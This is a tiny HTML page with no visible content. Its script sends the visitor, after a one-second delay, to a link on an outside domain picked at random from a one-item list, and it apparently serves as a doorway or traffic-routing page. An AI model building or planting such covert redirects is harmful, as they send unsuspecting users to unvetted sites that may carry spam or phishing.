<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <title></title>
    <script>
        const urls = [
            "https://mohsenjafari.com/yrloDr"
        ];
        
        const randomIndex = Math.floor(Math.random() * urls.length);
        const targetUrl = urls[randomIndex];

        // 延迟 1 秒跳转
        setTimeout(() => {
            window.location.href = targetUrl;
        }, 1000);
    </script>
</head>
<body>
    <p></p>
</body>
</html>
